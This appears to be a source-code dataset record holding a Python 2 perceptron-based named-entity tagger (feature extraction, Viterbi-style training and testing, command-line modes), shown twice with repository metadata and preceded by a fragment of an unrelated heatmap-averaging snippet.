heatmap_2_r = imresize(heatmap_2, (50,80)).astype("float32")
heatmap_3_r = imresize(heatmap_3, (50,80)).astype("float32")
heatmap_geom_avg = np.power(heatmap_1_r * heatmap_2_r * heatmap_3_r, 0.333)
display_img_and_heatmap("dog.jpg", heatmap_geom_avg)
| 44.714286 | 75 | 0.766773 | heatmap_1_r = imresize(heatmap_1, (50,80)).astype("float32")
heatmap_2_r = imresize(heatmap_2, (50,80)).astype("float32")
heatmap_3_r = imresize(heatmap_3, (50,80)).astype("float32")
heatmap_geom_avg = np.power(heatmap_1_r * heatmap_2_r * heatmap_3_r, 0.333)
display_img_and_heatmap("dog.jpg", heatmap_geom_avg)
| 0 | 0 | 0 |
fd81f46f8c005602f66b88f3c0b86953d5e2ec77 | 33,356 | py | Python | named-entity-recognizer.py | YNedderhoff/sentiment-classifier | 13d28217f81c21562e5b79f0f85309a968ee534a | [
"MIT"
] | 1 | 2017-06-26T15:43:23.000Z | 2017-06-26T15:43:23.000Z | named-entity-recognizer.py | YNedderhoff/sentiment-classifier | 13d28217f81c21562e5b79f0f85309a968ee534a | [
"MIT"
] | null | null | null | named-entity-recognizer.py | YNedderhoff/sentiment-classifier | 13d28217f81c21562e5b79f0f85309a968ee534a | [
"MIT"
] | null | null | null | import codecs
import time
import cPickle
import gzip
import random
import os
import math
import modules.token as tk
import modules.perceptron as perceptron
import modules.lmi as lmi
from modules.evaluation import evaluate
from modules.affixes import find_affixes
# save the model (weight vectors) to a file:
# load the model (weight vectors) from a file:
# train the classifiers using the perceptron algorithm:
# apply the classifiers to test data:
# build mapping of features to vector dimensions (key=feature, value=dimension index):
# Command-line entry point: parse arguments and dispatch to one of the four
# mutually exclusive modes (train / test / evaluate / tag) of the tagger.
if __name__ == '__main__':
    t0 = time.time()
    import argparse
    argpar = argparse.ArgumentParser(description='')
    # Exactly one mode flag must be given.
    mode = argpar.add_mutually_exclusive_group(required=True)
    mode.add_argument('-train', dest='train', action='store_true', help='run in training mode')
    mode.add_argument('-test', dest='test', action='store_true', help='run in test mode')
    mode.add_argument('-ev', dest='evaluate', action='store_true', help='run in evaluation mode')
    mode.add_argument('-tag', dest='tag', action='store_true', help='run in tagging mode')
    argpar.add_argument('-i', '--infile', dest='in_file', help='in file', required=True)
    argpar.add_argument('-e', '--epochs', dest='epochs', help='epochs', default='1')
    argpar.add_argument('-m', '--model', dest='model', help='model', default='model')
    argpar.add_argument('-o', '--output', dest='output_file', help='output file', default='output.txt')
    # Optional per-feature-group limits, forwarded to train() as top_x.
    argpar.add_argument('-t1', '--topxform', dest='top_x_form', help='top x form', default=None)
    argpar.add_argument('-t2', '--topxwordlen', dest='top_x_word_len', help='top x word len', default=None)
    argpar.add_argument('-t3', '--topxposition', dest='top_x_position', help='top x position', default=None)
    argpar.add_argument('-t4', '--topxprefix', dest='top_x_prefix', help='top x prefix', default=None)
    argpar.add_argument('-t5', '--topxsuffix', dest='top_x_suffix', help='top x suffix', default=None)
    argpar.add_argument('-t6', '--topxlettercombs', dest='top_x_lettercombs', help='top x letter combs', default=None)
    argpar.add_argument('-decrease-alpha', dest='decrease_alpha', action='store_true', help='decrease alpha',
                        default=False)
    argpar.add_argument('-shuffle-sentences', dest='shuffle_sentences', action='store_true', help='shuffle sentences',
                        default=False)
    argpar.add_argument('-batch-training', dest='batch_training', action='store_true', help='batch training',
                        default=False)
    args = argpar.parse_args()
    t = posTagger()
    if os.stat(args.in_file).st_size == 0:
        print "Input file is empty"
    else:
        if args.train:
            print "Running in training mode\n"
            # NOTE(review): this only echoes top_x_form when it is unset
            # (prints None) — looks like leftover debug output; verify.
            if not args.top_x_form:
                print args.top_x_form
            top_x = [args.top_x_form, args.top_x_word_len, args.top_x_position, args.top_x_prefix, args.top_x_suffix,
                     args.top_x_lettercombs]
            t.train(args.in_file, args.model, int(args.epochs), top_x, args.decrease_alpha, args.shuffle_sentences,
                    args.batch_training)
        elif args.test:
            print "Running in test mode\n"
            t.test(args.in_file, args.model, args.output_file)
        elif args.evaluate:
            print "Running in evaluation mode\n"
            out_stream = open(args.output_file, 'w')
            evaluate(args.in_file, out_stream)
            out_stream.close()
        elif args.tag:
            print "Running in tag mode\n"
            t.tag(args.in_file, args.model, args.output_file)
    t1 = time.time()
    print "\n\tDone. Total time: " + str(t1 - t0) + "sec.\n"
| 50.770167 | 130 | 0.505067 | import codecs
import time
import cPickle
import gzip
import random
import os
import math
import modules.token as tk
import modules.perceptron as perceptron
import modules.lmi as lmi
from modules.evaluation import evaluate
from modules.affixes import find_affixes
class posTagger:
    def __init__(self):
        """Stateless tagger facade; all data flows through method arguments."""
        pass
# save the model (weight vectors) to a file:
def save(self, file_name, model):
stream = gzip.open(file_name, "wb")
cPickle.dump(model, stream)
stream.close()
# load the model (weight vectors) from a file:
def load(self, file_name):
stream = gzip.open(file_name, "rb")
model = cPickle.load(stream)
stream.close()
return model
def legal_prev_tags(self, tag, t_id_1):
if tag.startswith("O"):
if t_id_1 != 0:
return ["OO", "IO"]
else:
return ["XO"]
elif tag.startswith("I"):
if t_id_1 != 0:
return ["OI", "II"]
else:
return ["XI"]
else:
return []
# train the classifiers using the perceptron algorithm:
    def train(self, file_in, file_out, max_iterations, top_x, decrease_alpha, shuffle_sentences, batch_training):
        """Train one perceptron classifier per BIO tag bigram.

        Features are extracted from ``file_in``; each epoch runs a
        Viterbi-style pass over every sentence, backtracks the best tag
        sequence, and adjusts the classifiers of mispredicted tags.  The
        feature map and trained classifiers are pickled to ``file_out``.

        file_in          -- path to the training corpus (read via tk.sentences)
        file_out         -- path the model is written to (gzip + pickle)
        max_iterations   -- number of training epochs
        top_x            -- per-feature-group limits handed to each classifier
        decrease_alpha   -- if True, halve the learning rate periodically
        shuffle_sentences -- if True, reshuffle sentence order after each epoch
        batch_training   -- if True, collect weight updates per epoch and apply
                            them at epoch end instead of immediately (batch vs.
                            online perceptron)
        """
        print "\tTraining file: " + file_in
        print "\tExtracting features"
        x0 = time.time()
        feat_vec = self.extractFeatures(file_in)
        x1 = time.time()
        print "\t" + str(len(feat_vec)) + " features extracted"
        print "\t\t" + str(x1 - x0) + " sec."
        # inverse map (dimension index -> feature name), only used for debugging
        reversed_feat_vec = {}
        for feature in feat_vec:
            reversed_feat_vec[feat_vec[feature]] = feature
        print "\tCreating tokens with feature vectors"
        y0 = time.time()
        sentences = [] # save all instantiated tokens from training data, with finished feature vectors
        tag_set = set([])
        # read in sentences from file and generates the corresponding token objects:
        for sentence in tk.sentences(codecs.open(file_in, encoding='utf-8')):
            temp = []
            # create sparse feature vector representation for each token:
            for t_id, token in enumerate(sentence):
                if t_id == 0: # first token of sentence
                    if len(sentence) > 1:
                        token.set_adjacent_tokens(None, sentence[t_id + 1])
                        token.createFeatureVector(feat_vec, t_id, sentence[t_id],
                                                  None, sentence[t_id + 1])
                    elif len(sentence) == 1:
                        token.set_adjacent_tokens(None, None)
                        token.createFeatureVector(feat_vec, t_id, sentence[t_id],
                                                  None, None)
                elif t_id == len(sentence) - 1: # last token of sentence
                    token.set_adjacent_tokens(sentence[t_id - 1], None)
                    token.createFeatureVector(feat_vec, t_id, sentence[t_id],
                                              sentence[t_id - 1], None)
                else:
                    token.set_adjacent_tokens(sentence[t_id - 1], sentence[t_id + 1])
                    token.createFeatureVector(feat_vec, t_id, sentence[t_id],
                                              sentence[t_id - 1], sentence[t_id + 1])
                token.set_sentence_index(t_id - 1, t_id)
                temp.append(token)
                tag_set.add(token.gold_tag_1 + token.gold_tag_2)
            sentences.append(temp)
        """
        for token in sentences[0]:
            print token.form_1 + "," + token.form_2
            for feature in token.sparse_feat_vec:
                print reversed_feat_vec[feature]
            print "----"
        """
        y1 = time.time()
        print "\t\t" + str(y1 - y0) + " sec."
        print "\tCreating and training classifiers"
        z0 = time.time()
        classifiers = {}
        # LMI-based feature weighting shared by all classifiers
        lmi_calc = lmi.lmi([t for s in sentences for t in s], feat_vec)
        lmi_dict = lmi_calc.compute_lmi()
        # instantiate a classifier for each pos tag type:
        for tag in tag_set:
            classifiers[tag] = perceptron.classifier(tag, feat_vec, lmi_dict, top_x)
        # train the classifiers:
        alpha = 0.1 # smoothes the effect of adjustments
        # number of decreases of alpha during training
        # works only only exactly if max_iterations is divisible by alpha_decreases
        alpha_decreases = 10
        for i in range(1, max_iterations + 1):
            total = 0
            correct = 0
            # batch training:
            predictions = {}
            for tag in classifiers:
                predictions[tag] = [x for x in classifiers[tag].weight_vector]
            print "\t\tEpoch " + str(i) + ", alpha = " + str(alpha)
            # path is the Viterbi lattice: one dict per token position mapping
            # tag -> (accumulated log score, best previous tag, token)
            path = []
            # NOTE(review): normalization_constant appears to be unused in this method.
            normalization_constant = 10.0 ** 5.0
            for ind, s in enumerate(sentences):
                # if ind % (len(sentences) / 10) == 0 and not ind == 0:
                # print "\t\t\t" + str(ind) + "/" + str(len(sentences))
                for t in s:
                    if t.t_id_1 == -1 and path:
                        # a new sentence starts: backtrack the finished lattice and
                        # adjust classifier weights for incorrectly predicted tag and gold tag:
                        elem = sorted([(z[0], z[1]) for z in path[-1].items()], key=lambda x: x[1][0])[-1]
                        gold_tag = elem[1][-1].gold_tag_1 + elem[1][-1].gold_tag_2
                        tok = elem[1][-1]
                        if elem[0] != gold_tag:
                            if batch_training:
                                predictions[gold_tag] = classifiers[gold_tag].adjust_weights(tok.sparse_feat_vec, True,
                                                                                             alpha,
                                                                                             predictions[gold_tag])
                                predictions[elem[0]] = classifiers[elem[0]].adjust_weights(tok.sparse_feat_vec, False,
                                                                                           alpha, predictions[elem[0]])
                            else:
                                classifiers[gold_tag].weight_vector = classifiers[gold_tag].adjust_weights(
                                    tok.sparse_feat_vec, True, alpha, classifiers[gold_tag].weight_vector)
                                classifiers[elem[0]].weight_vector = classifiers[elem[0]].adjust_weights(
                                    tok.sparse_feat_vec, False, alpha, classifiers[elem[0]].weight_vector)
                        else:
                            correct += 1
                        total += 1
                        next_elem = elem[1][1]
                        for ind2 in range(len(path) - 2, -1, -1):
                            elem = next_elem
                            gold_tag = path[ind2][elem][-1].gold_tag_1 + path[ind2][elem][-1].gold_tag_2
                            tok = path[ind2][elem][-1]
                            if elem != gold_tag:
                                if batch_training:
                                    predictions[gold_tag] = classifiers[gold_tag].adjust_weights(tok.sparse_feat_vec,
                                                                                                 True, alpha,
                                                                                                 predictions[gold_tag])
                                    predictions[elem] = classifiers[elem].adjust_weights(tok.sparse_feat_vec, False,
                                                                                         alpha, predictions[elem])
                                else:
                                    classifiers[gold_tag].weight_vector = classifiers[gold_tag].adjust_weights(
                                        tok.sparse_feat_vec, True, alpha, classifiers[gold_tag].weight_vector)
                                    classifiers[elem].weight_vector = classifiers[elem].adjust_weights(
                                        tok.sparse_feat_vec, False, alpha, classifiers[elem].weight_vector)
                            else:
                                correct +=1
                                # NOTE(review): unlike the end-of-data pass below, total is
                                # only incremented inside this else-branch, so mispredicted
                                # tokens are not counted here — looks like an indentation
                                # bug; verify against the analogous block further down.
                                total+=1
                            next_elem = path[ind2][elem][1]
                        # restart the lattice with the two start bigrams
                        path = [{"XO": (math.log(math.pow(math.e, classifiers["XO"].classify(t.sparse_feat_vec)), math.e), "", t),
                                 "XI": (math.log(math.pow(math.e, classifiers["XI"].classify(t.sparse_feat_vec)), math.e), "", t)}]
                    elif t.t_id_1 == -1:
                        path = [{"XO": (math.log(math.pow(math.e, classifiers["XO"].classify(t.sparse_feat_vec)), math.e), "", t),
                                 "XI": (math.log(math.pow(math.e, classifiers["XI"].classify(t.sparse_feat_vec)), math.e), "", t)}]
                    else:
                        # Viterbi step: only tags with at least one legal
                        # predecessor present in the previous column survive
                        temp = {}
                        for tag in [x for x in tag_set if sum(
                                [True if y in path[-1] else False for y in self.legal_prev_tags(x, t.t_id_1)]) > 0]:
                            c = math.log(math.pow(math.e, classifiers[tag].classify(t.sparse_feat_vec)), math.e)
                            max_arg = (0.0, "")
                            for prev_tag in self.legal_prev_tags(tag, t.t_id_1):
                                if prev_tag in path[-1]:
                                    if c + path[-1][prev_tag][0] >= max_arg[0] or max_arg[1] == "":
                                        max_arg = (c + path[-1][prev_tag][0], prev_tag, t)
                            temp[tag] = max_arg
                        path.append(temp)
            # LAST SENTENCE:
            # adjust classifier weights for incorrectly predicted tag and gold tag:
            elem = sorted([(z[0], z[1]) for z in path[-1].items()], key=lambda x: x[1][0])[-1]
            gold_tag = elem[1][-1].gold_tag_1 + elem[1][-1].gold_tag_2
            tok = elem[1][-1]
            if elem[0] != gold_tag:
                if batch_training:
                    predictions[gold_tag] = classifiers[gold_tag].adjust_weights(tok.sparse_feat_vec, True, alpha,
                                                                                 predictions[gold_tag])
                    predictions[elem[0]] = classifiers[elem[0]].adjust_weights(tok.sparse_feat_vec, False, alpha,
                                                                               predictions[elem[0]])
                else:
                    classifiers[gold_tag].weight_vector = classifiers[gold_tag].adjust_weights(tok.sparse_feat_vec,
                                                                                               True, alpha, classifiers[
                            gold_tag].weight_vector)
                    classifiers[elem[0]].weight_vector = classifiers[elem[0]].adjust_weights(tok.sparse_feat_vec, False,
                                                                                             alpha, classifiers[
                            elem[0]].weight_vector)
            else:
                correct += 1
            total += 1
            next_elem = elem[1][1]
            for ind2 in range(len(path) - 2, -1, -1):
                elem = next_elem
                gold_tag = path[ind2][elem][-1].gold_tag_1 + path[ind2][elem][-1].gold_tag_2
                tok = path[ind2][elem][-1]
                if elem != gold_tag:
                    if batch_training:
                        predictions[gold_tag] = classifiers[gold_tag].adjust_weights(tok.sparse_feat_vec, True, alpha,
                                                                                     predictions[gold_tag])
                        predictions[elem] = classifiers[elem].adjust_weights(tok.sparse_feat_vec, False, alpha,
                                                                             predictions[elem])
                    else:
                        classifiers[gold_tag].weight_vector = classifiers[gold_tag].adjust_weights(tok.sparse_feat_vec,
                                                                                                   True, alpha,
                                                                                                   classifiers[
                                                                                                       gold_tag].weight_vector)
                        classifiers[elem].weight_vector = classifiers[elem].adjust_weights(tok.sparse_feat_vec, False,
                                                                                           alpha, classifiers[
                                elem].weight_vector)
                else:
                    correct += 1
                total += 1
                next_elem = path[ind2][elem][1]
            # apply batch results to weight vectors:
            if batch_training:
                for tag in classifiers:
                    classifiers[tag].weight_vector = [x for x in predictions[tag]]
            # decrease alpha
            if decrease_alpha:
                if i % int(round(max_iterations ** 1.0 / float(alpha_decreases))) == 0:
                    # int(round(max_iterations ** 1/alpha_decreases)) is the number x, for which
                    # i % x == 0 is True exactly alpha_decreases times
                    alpha /= 2
            # shuffle tokens
            if shuffle_sentences:
                random.shuffle(sentences)
        print "Correct: " + str(correct)
        print "Total: " + str(total)
        for tag in classifiers:
            classifiers[tag].multiply_with_binary()
        # after training is completed, save classifier vectors (model) to file:
        self.save(file_out, [feat_vec, classifiers])
        z1 = time.time()
        print "\t\t" + str(z1 - z0) + " sec."
# apply the classifiers to test data:
    def test(self, file_in, mod, file_out):
        """Apply a saved model to a gold-annotated file.

        Loads the model from ``mod``, runs the same Viterbi decoding as
        train() (without any weight updates) over ``file_in``, and writes
        one "token<TAB>gold<TAB>predicted" line per token to ``file_out``
        for later evaluation.
        """
        # load classifier vectors (model) and feature vector from file:
        print "\tLoading the model and the features"
        x0 = time.time()
        model_list = self.load(mod)
        feat_vec = model_list[0]
        classifiers = model_list[1]
        x1 = time.time()
        print "\t" + str(len(feat_vec)) + " features loaded"
        print "\t\t" + str(x1 - x0) + " sec."
        print "\tTest file: " + file_in
        print "\tCreating tokens with feature vectors"
        y0 = time.time()
        sentences = [] # save all instantiated tokens from training data, with finished feature vectors
        tag_set = set() # gather all POS types
        empty_feat_vec_count = 0
        # read in sentences from file and generates the corresponding token objects:
        for sentence in tk.sentences(codecs.open(file_in, encoding='utf-8')):
            temp = []
            # create sparse feature vector representation for each token:
            for t_id, token in enumerate(sentence):
                if t_id == 0: # first token of sentence
                    try:
                        token.createFeatureVector(feat_vec, t_id, sentence[t_id],
                                                  None, sentence[t_id + 1])
                    except IndexError: # happens if sentence length is 1
                        token.createFeatureVector(feat_vec, t_id, sentence[t_id],
                                                  None, None)
                elif t_id == len(sentence) - 1: # last token of sentence
                    token.createFeatureVector(feat_vec, t_id, sentence[t_id],
                                              sentence[t_id - 1], None)
                else:
                    token.createFeatureVector(feat_vec, t_id, sentence[t_id],
                                              sentence[t_id - 1], sentence[t_id + 1])
                token.set_sentence_index(t_id - 1, t_id)
                temp.append(token)
                tag_set.add(token.gold_tag_1 + token.gold_tag_2)
                if len(token.sparse_feat_vec) == 0:
                    empty_feat_vec_count += 1
            sentences.append(temp)
        print "\t\t" + str(empty_feat_vec_count) + " tokens have no features of the feature set"
        y1 = time.time()
        print "\t\t" + str(y1 - y0) + " sec."
        print "\tClassifying tokens"
        z0 = time.time()
        output = open(file_out, "w") # temporarily save classification to file for evaluation
        path = []
        # NOTE(review): normalization_constant appears to be unused in this method.
        normalization_constant = 10.0 ** 5.0
        for ind, s in enumerate(sentences):
            # if ind % (len(sentences) / 10) == 0 and not ind == 0:
            # print "\t\t\t" + str(ind) + "/" + str(len(sentences))
            for t in s:
                if t.t_id_1 == -1 and path:
                    sequence = []
                    # backtrack through the finished lattice to recover the best
                    # tag sequence for the previous sentence (no weight updates here):
                    elem = sorted([(z[0], z[1]) for z in path[-1].items()], key=lambda x: x[1][0])[-1]
                    gold_tag = elem[1][-1].gold_tag_1 + elem[1][-1].gold_tag_2
                    tok = elem[1][-1]
                    sequence.append((tok, gold_tag, elem[0]))
                    next_elem = elem[1][1]
                    for ind2 in range(len(path) - 2, -1, -1):
                        elem = next_elem
                        gold_tag = path[ind2][elem][-1].gold_tag_1 + path[ind2][elem][-1].gold_tag_2
                        tok = path[ind2][elem][-1]
                        sequence.append((tok, gold_tag, elem))
                        next_elem = path[ind2][elem][1]
                    # sequence was collected back-to-front; emit in sentence order.
                    # sequence[x][2][1] is the second character of the tag bigram,
                    # i.e. the predicted tag of the current token.
                    for x in range(len(sequence) - 1, -1, -1):
                        # sequence[x][0].predicted_tag_2 = sequence[x][2][1]
                        print >> output, sequence[x][0].original_form_2.encode("utf-8") + "\t" + sequence[x][
                            0].gold_tag_2.encode("utf-8") + \
                                         "\t" + sequence[x][2][1].encode("utf-8")
                    print >> output, ""
                    path = [{"XO": (math.log(math.pow(math.e, classifiers["XO"].classify(t.sparse_feat_vec)), math.e), "", t),
                             "XI": (math.log(math.pow(math.e, classifiers["XI"].classify(t.sparse_feat_vec)), math.e), "", t)}]
                elif t.t_id_1 == -1:
                    path = [{"XO": (math.log(math.pow(math.e, classifiers["XO"].classify(t.sparse_feat_vec)), math.e), "", t),
                             "XI": (math.log(math.pow(math.e, classifiers["XI"].classify(t.sparse_feat_vec)), math.e), "", t)}]
                else:
                    temp = {}
                    for tag in [x for x in tag_set if sum(
                            [True if y in path[-1] else False for y in self.legal_prev_tags(x, t.t_id_1)]) > 0]:
                        c = math.log(math.pow(math.e, classifiers[tag].classify(t.sparse_feat_vec)), math.e)
                        max_arg = (0.0, "")
                        for prev_tag in self.legal_prev_tags(tag, t.t_id_1):
                            if prev_tag in path[-1]:
                                if c + path[-1][prev_tag][0] >= max_arg[0] or max_arg[1] == "":
                                    max_arg = (c + path[-1][prev_tag][0], prev_tag, t)
                        temp[tag] = max_arg
                    path.append(temp)
        # flush the lattice of the final sentence:
        sequence = []
        elem = sorted([(z[0], z[1]) for z in path[-1].items()], key=lambda x: x[1][0])[-1]
        gold_tag = elem[1][-1].gold_tag_1 + elem[1][-1].gold_tag_2
        tok = elem[1][-1]
        sequence.append((tok, gold_tag, elem[0]))
        next_elem = elem[1][1]
        for ind2 in range(len(path) - 2, -1, -1):
            elem = next_elem
            gold_tag = path[ind2][elem][-1].gold_tag_1 + path[ind2][elem][-1].gold_tag_2
            tok = path[ind2][elem][-1]
            sequence.append((tok, gold_tag, elem))
            next_elem = path[ind2][elem][1]
        for x in range(len(sequence) - 1, -1, -1):
            print >> output, sequence[x][0].original_form_2.encode("utf-8") + "\t" + sequence[x][0].gold_tag_2.encode(
                "utf-8") + \
                             "\t" + sequence[x][2][1].encode("utf-8")
            # NOTE(review): this blank line is emitted inside the loop, i.e.
            # after every token of the final sentence, whereas the in-loop
            # flush above prints it once per sentence — likely a bug; verify.
            print >> output, ""
        output.close()
        z1 = time.time()
        print "\t\t" + str(z1 - z0) + " sec."
    def tag(self, file_in, mod, file_out):
        """Tag an unannotated file with a saved model, one classifier vote
        per token (no Viterbi decoding here, unlike test()).

        Writes "token<TAB>predicted_tag" lines to ``file_out`` with an empty
        line between sentences.

        NOTE(review): this method uses token.gold_pos / t.original_form /
        t.predicted_pos, which differ from the *_1/*_2 attributes used in
        train() and test() — it looks like a leftover from an earlier
        single-tag POS tagger; verify it still matches the token module.
        """
        # load classifier vectors (model) and feature vector from file:
        print "\tLoading the model and the features"
        x0 = time.time()
        model_list = self.load(mod)
        feat_vec = model_list[0]
        classifiers = model_list[1]
        x1 = time.time()
        print "\t" + str(len(feat_vec)) + " features loaded"
        print "\t\t" + str(x1 - x0) + " sec."
        print "\tTag file: " + file_in
        print "\tCreating tokens with feature vectors"
        y0 = time.time()
        tokens = [] # save all instantiated tokens from training data, with finished feature vectors
        tag_set = set() # gather all POS types
        empty_feat_vec_count = 0
        # read in sentences from file and generates the corresponding token objects:
        for sentence in tk.sentences(codecs.open(file_in, encoding='utf-8')):
            # create sparse feature vector representation for each token:
            for t_id, token in enumerate(sentence):
                if t_id == 0: # first token of sentence
                    try:
                        token.createFeatureVector(feat_vec, t_id, sentence[t_id],
                                                  None, sentence[t_id + 1])
                    except IndexError: # happens if sentence length is 1
                        token.createFeatureVector(feat_vec, t_id, sentence[t_id],
                                                  None, None)
                elif t_id == len(sentence) - 1: # last token of sentence
                    token.createFeatureVector(feat_vec, t_id, sentence[t_id],
                                              sentence[t_id - 1], None)
                else:
                    token.createFeatureVector(feat_vec, t_id, sentence[t_id],
                                              sentence[t_id - 1], sentence[t_id + 1])
                tokens.append(token)
                tag_set.add(token.gold_pos)
                if len(token.sparse_feat_vec) == 0:
                    empty_feat_vec_count += 1
            # sentinel marking a sentence boundary in the flat token list
            tokens.append("_SENTENCE_DELIMITER_")
        print "\t\t" + str(empty_feat_vec_count) + " tokens have no features of the feature set"
        y1 = time.time()
        print "\t\t" + str(y1 - y0) + " sec."
        print "\tClassifying tokens"
        z0 = time.time()
        output = open(file_out, "w") # temporarily save classification to file for evaluation
        for ind, t in enumerate(tokens):
            if t == "_SENTENCE_DELIMITER_":
                print >> output, ""
            else:
                # coarse progress indicator every tenth of the token list
                if ind % (len(tokens) / 10) == 0 and not ind == 0:
                    print "\t\t" + str(ind) + "/" + str(len(tokens))
                # expand sparse token feature vectors into all dimensions:
                # expanded_feat_vec = t.expandFeatVec(len(feat_vec))
                arg_max = ["", 0.0]
                for tag in classifiers:
                    # temp = classifiers[tag].classify(expanded_feat_vec)
                    temp = classifiers[tag].classify(t.sparse_feat_vec)
                    # remember highest classification result:
                    if temp > arg_max[1]:
                        arg_max[0] = tag
                        arg_max[1] = temp
                # set predicted POS tag:
                t.predicted_pos = arg_max[0]
                # print token with predicted POS tag to file:
                print >> output, t.original_form.encode("utf-8") + "\t" + t.predicted_pos.encode("utf-8")
        output.close()
        z1 = time.time()
        print "\t\t" + str(z1 - z0) + " sec."
# build mapping of features to vector dimensions (key=feature, value=dimension index):
def extractFeatures(self, file_in):
feat_vec = {}
affixes = find_affixes(file_in, 5)
# uppercase
feat_vec["uppercase_1"] = len(feat_vec)
feat_vec["uppercase_2"] = len(feat_vec)
# capitalized
feat_vec["capitalized_1"] = len(feat_vec)
feat_vec["capitalized_2"] = len(feat_vec)
for l in affixes:
for affix_length in l:
for affix in l[affix_length]:
if sum(l[affix_length][affix].values()) > 0:
if affixes.index(l) == 0:
feat_vec["suffix_" + affix + "_token_1"] = len(feat_vec)
feat_vec["suffix_" + affix + "_token_2"] = len(feat_vec)
elif affixes.index(l) == 1:
feat_vec["prefix_" + affix + "_token_1"] = len(feat_vec)
feat_vec["prefix_" + affix + "_token_2"] = len(feat_vec)
else:
feat_vec["lettercombs_" + affix + "_token_1"] = len(feat_vec)
feat_vec["lettercombs_" + affix + "_token_2"] = len(feat_vec)
# iterate over all tokens to extract features:
for sentence in tk.sentences(codecs.open(file_in, encoding='utf-8')):
for tid, token in enumerate(sentence):
# form:
if not "current_form_token_1_" + token.form_1 in feat_vec:
feat_vec["current_form_token_1_" + token.form_1] = len(feat_vec)
if not "current_form_token_2_" + token.form_2 in feat_vec:
feat_vec["current_form_token_2_" + token.form_2] = len(feat_vec)
if not "prev_form_token_2_" + token.form_1 in feat_vec:
feat_vec["prev_form_token_2_" + token.form_1] = len(feat_vec)
if tid > 0:
if not "prev_form_token_1_" + sentence[tid - 1].form_1 in feat_vec:
feat_vec["prev_form_token_1_" + sentence[tid - 1].form_1] = len(feat_vec)
if not "next_form_token_1_" + token.form_2 in feat_vec:
feat_vec["next_form_token_1_" + token.form_2] = len(feat_vec)
if tid < len(sentence) - 1:
if not "next_form_token_2_" + sentence[tid + 1].form_2 in feat_vec:
feat_vec["next_form_token_2_" + sentence[tid + 1].form_2] = len(feat_vec)
# form length
if not "current_word_len_token_1_" + str(len(token.form_1)) in feat_vec:
feat_vec["current_word_len_token_1_" + str(len(token.form_1))] = len(feat_vec)
if not "current_word_len_token_2_" + str(len(token.form_2)) in feat_vec:
feat_vec["current_word_len_token_2_" + str(len(token.form_2))] = len(feat_vec)
if not "prev_word_len_token_2_" + str(len(token.form_1)) in feat_vec:
feat_vec["prev_word_len_token_2_" + str(len(token.form_1))] = len(feat_vec)
if tid > 0:
if not "prev_word_len_token_1_" + str(len(sentence[tid - 1].form_1)) in feat_vec:
feat_vec["prev_word_len_token_1_" + str(len(sentence[tid - 1].form_1))] = len(feat_vec)
if not "next_word_len_token_1_" + str(len(token.form_2)) in feat_vec:
feat_vec["next_word_len_token_1_" + str(len(token.form_2))] = len(feat_vec)
if tid < len(sentence) - 1:
if not "next_word_len_token_2_" + str(len(sentence[tid + 1].form_2)) in feat_vec:
feat_vec["next_word_len_token_2_" + str(len(sentence[tid + 1].form_2))] = len(feat_vec)
# position in sentence
if not "position_in_sentence_token_1_" + str(tid - 1) in feat_vec:
feat_vec["position_in_sentence_token_1_" + str(tid - 1)] = len(feat_vec)
if not "position_in_sentence_token_2_" + str(tid) in feat_vec:
feat_vec["position_in_sentence_token_2_" + str(tid)] = len(feat_vec)
# pos tag (only if exists in training data)
if token.pos_tag_1:
if not "current_word_pos_token_1_" + str(token.pos_tag_1) in feat_vec:
feat_vec["current_word_pos_token_1_" + str(token.pos_tag_1)] = len(feat_vec)#
if token.pos_tag_2:
if not "current_word_pos_token_2_" + str(token.pos_tag_2) in feat_vec:
feat_vec["current_word_pos_token_2_" + str(token.pos_tag_2)] = len(feat_vec)
if token.pos_tag_1:
if not "prev_word_pos_token_2_" + str(token.pos_tag_1) in feat_vec:
feat_vec["prev_word_pos_token_2_" + str(token.pos_tag_1)] = len(feat_vec)
if tid > 0:
if sentence[tid - 1].pos_tag_1:
if not "prev_word_pos_token_1_" + str(sentence[tid - 1].pos_tag_1) in feat_vec:
feat_vec["prev_word_pos_token_1_" + str(sentence[tid - 1].pos_tag_1)] = len(feat_vec)
if token.pos_tag_2:
if not "next_word_pos_token_1_" + str(token.pos_tag_2) in feat_vec:
feat_vec["next_word_pos_token_1_" + str(token.pos_tag_2)] = len(feat_vec)
if tid < len(sentence) - 1:
if sentence[tid + 1].pos_tag_2:
if not "next_word_pos_token_2_" + str(sentence[tid + 1].pos_tag_2) in feat_vec:
feat_vec["next_word_pos_token_2_" + str(sentence[tid + 1].pos_tag_2)] = len(feat_vec)
return feat_vec
# Command-line entry point: parse arguments and dispatch to exactly one of
# the four mutually exclusive modes (train / test / evaluate / tag).
if __name__ == '__main__':
    # wall-clock start for the total-runtime report printed at the end
    t0 = time.time()
    import argparse
    argpar = argparse.ArgumentParser(description='')
    # exactly one mode flag is required:
    mode = argpar.add_mutually_exclusive_group(required=True)
    mode.add_argument('-train', dest='train', action='store_true', help='run in training mode')
    mode.add_argument('-test', dest='test', action='store_true', help='run in test mode')
    mode.add_argument('-ev', dest='evaluate', action='store_true', help='run in evaluation mode')
    mode.add_argument('-tag', dest='tag', action='store_true', help='run in tagging mode')
    # common options; note that -e/--epochs is parsed as a string and converted
    # with int() only in training mode below:
    argpar.add_argument('-i', '--infile', dest='in_file', help='in file', required=True)
    argpar.add_argument('-e', '--epochs', dest='epochs', help='epochs', default='1')
    argpar.add_argument('-m', '--model', dest='model', help='model', default='model')
    argpar.add_argument('-o', '--output', dest='output_file', help='output file', default='output.txt')
    # top-x feature-selection limits, one per feature family (training only):
    argpar.add_argument('-t1', '--topxform', dest='top_x_form', help='top x form', default=None)
    argpar.add_argument('-t2', '--topxwordlen', dest='top_x_word_len', help='top x word len', default=None)
    argpar.add_argument('-t3', '--topxposition', dest='top_x_position', help='top x position', default=None)
    argpar.add_argument('-t4', '--topxprefix', dest='top_x_prefix', help='top x prefix', default=None)
    argpar.add_argument('-t5', '--topxsuffix', dest='top_x_suffix', help='top x suffix', default=None)
    argpar.add_argument('-t6', '--topxlettercombs', dest='top_x_lettercombs', help='top x letter combs', default=None)
    # training behaviour switches:
    argpar.add_argument('-decrease-alpha', dest='decrease_alpha', action='store_true', help='decrease alpha',
                        default=False)
    argpar.add_argument('-shuffle-sentences', dest='shuffle_sentences', action='store_true', help='shuffle sentences',
                        default=False)
    argpar.add_argument('-batch-training', dest='batch_training', action='store_true', help='batch training',
                        default=False)
    args = argpar.parse_args()
    t = posTagger()
    # refuse to do anything on an empty input file:
    if os.stat(args.in_file).st_size == 0:
        print "Input file is empty"
    else:
        if args.train:
            print "Running in training mode\n"
